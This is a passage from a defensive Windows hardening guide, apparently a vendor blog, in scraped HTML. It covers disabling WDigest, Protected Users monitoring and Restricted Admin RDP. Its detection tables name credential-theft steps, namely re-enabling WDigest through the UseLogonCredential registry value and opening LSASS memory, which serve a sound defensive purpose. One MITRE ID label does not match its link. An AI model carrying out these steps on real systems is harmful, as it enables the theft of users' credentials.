overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Removal of Account from Protected User Group</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1098/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1098 – Account Manipulation</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for an account that has been removed from the Protected Users group. </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Attempted Logon of an Account in the Protected User Group from a Nonprivileged Access Workstation</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for logon attempts from accounts in the Protected Users group authenticating from workstations of nonprivileged users.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 25: Detection opportunities for the Protected Users security group</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Clear-Text Password Protections</span></h4> <p><span style="vertical-align: baseline;">In addition to restricting access for privileged accounts, controls should be enforced that minimize the exposure of credentials and tokens in memory on endpoints.</span></p> <p><span style="vertical-align: baseline;">On older Windows versions, clear-text passwords are stored in memory (LSASS) to primarily support WDigest authentication. WDigest should be explicitly disabled on all Windows endpoints where it is not disabled by default.</span></p> <p><span style="vertical-align: baseline;">By default, WDigest authentication is disabled in Windows 8.1+ and in Windows Server 2012 R2+.</span></p> <p><span style="vertical-align: baseline;">Beginning with Windows 7 and Windows Server 2008 R2, after installing KB2871997, WDigest authentication can be configured either by modifying the registry or by using the Microsoft Security Guide GPO template from the <a href="https://www.microsoft.com/en-us/download/details.aspx?id=55319" rel="noopener" target="_blank">Microsoft Security Compliance Toolkit</a></span><span style="vertical-align: baseline;">.</span></p> <h5><span style="vertical-align: baseline;">Registry Method</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential REG_DWORD = "0"</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 36: Registry key and value for disabling WDigest authentication</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Another registry setting that should be explicitly configured is the </span><code style="vertical-align: baseline;">TokenLeakDetectDelaySecs</code><span style="vertical-align: baseline;"> setting (Figure 37), which will clear credentials in memory of logged-off users after 30 seconds, mimicking the behavior of Windows 8.1 and above.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\TokenLeakDetectDelaySecs REG_DWORD = "30"</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 37: Registry key and value for enforcing the TokenLeakDetectDelaySecs setting</span></p></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Group Policy Method</span></h5> <p><span style="vertical-align: baseline;">Using the Microsoft Security Guide Group Policy template, WDigest authentication can be disabled via a GPO setting (Figure 38).</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MS Security Guide &gt; WDigest Authentication</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"><span style="font-style: italic; vertical-align: baseline;"><span style="font-style: italic; vertical-align: baseline;">Disabled</span></span></li> </ul> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig38.max-1000x1000.png" alt="Disabling WDigest Authentication via the MS Security Guide Group Policy Template"> </a> <figcaption class="article-image__caption "><p data-block-key="11qec">Figure 38: Disabling WDigest authentication via the MS Security Guide Group Policy Template</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Additionally, an organization should verify that </span><code style="vertical-align: baseline;">Allow*</code><span style="vertical-align: baseline;"> settings are not specified within the registry keys referenced in Figure 39, as this configuration would permit the </span><code style="vertical-align: baseline;">tspkgs</code><span style="vertical-align: baseline;">/CredSSP providers to store clear-text passwords in memory.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 39: Additional registry keys for hardening against clear-text password storage</span></p></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Group Policy Reprocessing</span></h5> <p><span style="vertical-align: baseline;">Threat actors can manually enable WDigest authentication on endpoints by directly modifying the registry (</span><code style="vertical-align: baseline;">UseLogonCredential</code><span style="vertical-align: baseline;"> configured to a value of </span><code style="vertical-align: baseline;">1</code><span style="vertical-align: baseline;">). Even on endpoints where WDigest authentication is automatically disabled by default, it is recommended to enforce the GPO settings noted as follows, which will enforce automatic group policy reprocessing for the configured (expected) settings on an automated basis.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; System &gt; Group Policy &gt; Configure security policy processing</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Enabled - Process even if the Group Policy objects have not changed</span></p> </li> </ul> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; System &gt; Group Policy &gt; Configure registry policy processing</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Enabled - Process even if the Group Policy objects have not changed</span></p> </li> </ul> </li> </ul> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">By default, Group Policy settings are only reprocessed and reapplied if the actual Group Policy was modified prior to the default refresh interval.</span></p> <p><span style="vertical-align: baseline;">As KB2871997 is not applicable for Windows XP, Windows Server 2003, and Windows Server 2008, to disable WDigest authentication on these platforms, prior to a system reboot, WDigest needs to be removed from the listing of LSA security packages within the registry (Figure 40 and Figure 41).</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\Security Packages</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 40: Registry key to modify LSA security packages</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig41.max-1000x1000.png" alt="LSA security Package Registry Key Before and After Removal of WDigest Authentication from Listing of Providers"> </a> <figcaption class="article-image__caption "><p data-block-key="71ljq">Figure 41: LSA security package registry key before and after removal of WDigest authentication from listing of providers</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Detection Opportunities for WDigest Authentication Conditions</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Enable WDigest Authentication</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1112/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1112 – Modify Registry</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for evidence of WDigest being enabled in the Windows Registry.<br/><br/></span></p> <pre class="language-plain"><code>HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential REG_DWORD = "1"</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 42: WDigest Windows Registry modification</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">LSASS Memory Access</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1003/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1003.002 - OS Credential Dumping - LSASS Memory</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for processes accessing lsass.exe memory (Sysmon Event ID 10 with GrantedAccess 0x1010 or 0x1FFFFF). Alert on any non-system process opening a handle to LSASS. Deploy LSA Protection (RunAsPPL) and Credential Guard on all supported endpoints.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 26: Detection opportunities for WDigest authentication conditions</span></div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Credential Protections When Using RDP</span></h4> <h5><span style="vertical-align: baseline;">Restricted Admin Mode for RDP</span></h5> <p><span style="vertical-align: baseline;">Restricted Admin mode for RDP can be enabled for all end-user systems assigned to personnel that perform Remote Desktop connections to servers or workstations with administrative credentials. This feature can limit the in-memory exposure of administrative credentials on a destination endpoint when accessed using RDP.</span></p> <p><span style="vertical-align: baseline;">To leverage Restricted Admin RDP, the command referenced in Figure 43 can be invoked.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>mstsc.exe /RestrictedAdmin</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 43: Command to invoke restricted admin RDP</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">When an RDP connection uses the Restricted Admin mode, if the authenticating account is an administrator on the destination endpoint, the credentials for the user account are </span><strong style="vertical-align: baseline;">not</strong><span style="vertical-align: baseline;"> stored in memory; rather, the context of the user account appears as the destination machine account (</span><code style="vertical-align: baseline;">domain\destination-computer$</code><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">To leverage Restricted Admin mode for RDP, settings must be enforced on the originating endpoint in addition to the destination endpoint.</span></p> <h6><span style="vertical-align: baseline;">Originating Endpoint (Client Mode - Windows 7 and Windows Server 2008 R2 and above)</span></h6> <p><span style="vertical-align: baseline;">A GPO setting must be applied to the originating endpoint initiating the remote desktop session using the </span><span style="font-style: italic; vertical-align: baseline;">Restricted Admin</span><span style="vertical-align: baseline;"> feature.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; System &gt; Credential Delegation &gt; Restrict delegation of credentials to remote servers</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Require Restricted Admin</span><span style="vertical-align: baseline;"> &gt; set to </span><span style="font-style: italic; vertical-align: baseline;">Enabled</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Use the Following Restricted Mode</span><span style="vertical-align: baseline;"> &gt; </span><span style="font-style: italic; vertical-align: baseline;">Required Restricted Admin</span></p> </li> </ul> </li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">Configuring this GPO setting will result in the registry keys noted in Figure 44 being configured on an endpoint.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\Software\Policies\Microsoft\Windows\CredentialsDelegation\RestrictedRemoteAdministration 0 = Disabled 1 = Enabled HKLM\Software\Policies\Microsoft\Windows\CredentialsDelegation\RestrictedRemoteAdministrationType 1 = Require Restricted Admin 2 = Require Remote Credential Guard 3 = Restrict Credential Delegation</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 44: Registry settings for requiring Restricted Admin mode</span></p></div> <div class="block-paragraph_advanced"><h6><span style="vertical-align: baseline;">Destination Endpoint (Server Mode - Windows 8.1 and Windows Server 2012 R2 and above)</span></h6> <p><span style="vertical-align: baseline;">A registry setting will need to be configured (Figure 45).</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin 0 = Enabled 1 = Disabled</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 45: Registry setting for enabling or disabling Restricted Admin RDP</span></p></div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">Recommended:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Set the registry value to </span><code style="vertical-align: baseline;">0</code><span style="vertical-align: baseline;"> to enable Restricted Admin mode.</span></p> <p><span style="vertical-align: baseline;">With Restricted Admin RDP, another setting that should be configured is the </span><code style="vertical-align: baseline;">DisableRestrictedAdminOutboundCreds</code><span style="vertical-align: baseline;"> registry key (Figure 46).</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdminOutboundCreds 0 = default value (doesn't exist) - Admin Outbound Creds are Enabled 1 = Admin Outbound Creds are Disabled</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 46: Registry setting for disabling admin outbound credentials</span></p></div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">Recommended:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Set the registry value to </span><code style="vertical-align: baseline;">1</code><span style="vertical-align: baseline;"> to disable admin outbound credentials.</span></p> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">With this setting set to </span><code style="vertical-align: baseline;">0</code><span style="vertical-align: baseline;">, any outbound authentication requests will appear as the system (</span><code style="vertical-align: baseline;">domain\destination-computer$)</code><span style="vertical-align: baseline;"> that a user connected to using Restricted Admin mode. Setting this to </span><code style="vertical-align: baseline;">1</code><span style="vertical-align: baseline;"> disables the ability to authenticate to any downstream network resources when attempting to authenticate outbound from a system that a user connected to using Restricted Admin mode for RDP.</span></p> <p><span style="vertical-align: baseline;">For additional information regarding Restricted Admin mode for RDP, reference:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://support.microsoft.com/kb/2973351" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://support.microsoft.com/kb/2973351</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://blogs.technet.microsoft.com/kfalde/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://blogs.technet.microsoft.com/kfalde/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2/</span></a></p> </li> </ul> <h4><span style="vertical-align: baseline;">Detection Opportunities for Restricted Admin Mode for RDP</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Disable Restricted Admin Mode for RDP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1112/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1112 – Modify Registry</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for an account disabling Restricted Admin mode for RDP in the Windows Registry.<br/><br/></span></p> <pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin REG_DWORD = "1"</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 47: Restricted Admin mode for RDP being disabled in the Windows Registry on a destination endpoint</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Disable Require Restricted Admin</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1484/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1484.001 – Domain Policy Modification: Group Policy Modification</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for the </span><span style="font-style: italic; vertical-align: baseline;">Require Restricted Admin</span><span style="vertical-align: baseline;"> option being disabled within a GPO configuration. </span></p> <pre class="language-plain"><code>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; System &gt; Credential Delegation &gt; Restrict delegation of credentials to remote servers "Require Restricted Admin" &gt; set to Disabled</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 48: Require Restricted Admin being disabled in a GPO</span></p> </td> </tr> </tbody> </table></div></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 27: Detection opportunities for Restricted Admin Mode for RDP</span></div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Windows Defender Remote Credential Guard</span></h4> <p><span style="vertical-align: baseline;">For Windows 10 and Windows Server 2016 endpoints, Windows Defender Remote Credential Guard can be leveraged to reduce the exposure of privileged accounts in memory on destination endpoints when Remote Desktop is used for connectivity. With Remote Credential Guard, all credentials remain on the client (origination system) and are not directly exposed to the destination endpoint. Instead, the destination endpoint requests service tickets from the source as needed.</span></p> <p><span style="vertical-align: baseline;">When a user logs in via RDP to an endpoint that has Remote Credential Guard enabled, none of the SSPs in memory store the account's clear-text password or password hash. Note that Kerberos tickets remain in memory to allow interactive (and single sign-on [SSO]) experiences from the destination server.</span></p> <p><span style="vertical-align: baseline;">The Remote Desktop client (origination) host:</span></p> <ul> <li 